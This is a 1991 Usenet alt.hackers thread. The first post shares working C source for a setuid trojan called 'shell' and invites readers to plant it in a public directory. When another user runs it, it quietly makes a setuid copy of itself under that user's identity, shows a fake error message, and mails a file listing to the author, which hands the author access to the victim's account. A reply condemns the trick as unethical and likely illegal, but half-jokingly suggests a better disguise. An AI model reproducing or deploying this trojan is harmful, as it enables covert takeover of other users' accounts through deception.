[alt.hackers] set user ID..

rhl@computing-maths.cardiff.ac.uk (Robert Hartill) (06/14/91)

Here's a little hack, I keep the exe version in a public directory 
in a /well directory.

It uses the set user ID bit to give access to the accounts of anyone 
curious enough to run it.

Name the exe file 'shell' and replace 'rhl' for your user ID.

----------------------

#include <stdio.h>
#include <stdlib.h>

void main()
  {
  char command[80];
  char c;

  if(strcmp(getlogin(),"rhl") == 0) 
     {
     printf("Hello rhl\n");
     while(1)
        {
         printf("shell==>");
         c=0;
         while ((command[c++] = getchar()) != '\n' );
         command[c-1] = '\0';
         system(command);
        }
    }
    else 
        {
        system("cp shell .shell.`whoami`");
        system("chmod 4777 .shell.`whoami`");
        printf("Divide by zero at line 0043 \n"); 
        system("ls -alc | mail rhl");
        }
  }


----------------------- 
Does anyone know how to get 'cd' to work ?

by buy,
	rob.

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::     Robert Hartill, Dept Of Computing Mathematics, UWCC, Cardiff, UK.     ::
::          e-mail : rhl@cm.cf.ac.uk         Fax : 0222 666182               ::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
He is a self-made man, and worships his creator.
-John Bright 1868.
-------------------------------------------------------------------------------

hollombe@ttidca.TTI.COM (The Polymath) (06/15/91)

I guess everyone writes one of these sooner or later.  I confess I did one
once (merely as an exercise, of course. (-: ).  I don't think it qualifies
as a hack, though.  It's neither original nor clever.  It doesn't even
compromise system security unless someone with superuser privilege is
stupid enough to trip over it.  It's certainly unethical and probably
illegal.

At best, it's a prank.  At worst, it could get you fired and/or jailed.  I
give it 2 out of 10.  A better disguise might get you a 3, but that's
about all it's worth.

Try again?

-- 
The Polymath (aka: Jerry Hollombe, M.A., CDP, aka: hollombe@ttidca.tti.com)
Head Robot Wrangler at Citicorp                   Illegitimis non
3100 Ocean Park Blvd.   (213) 450-9111, x2483       Carborundum
Santa Monica, CA  90405 {rutgers|pyramid|philabs|psivax}!ttidca!hollombe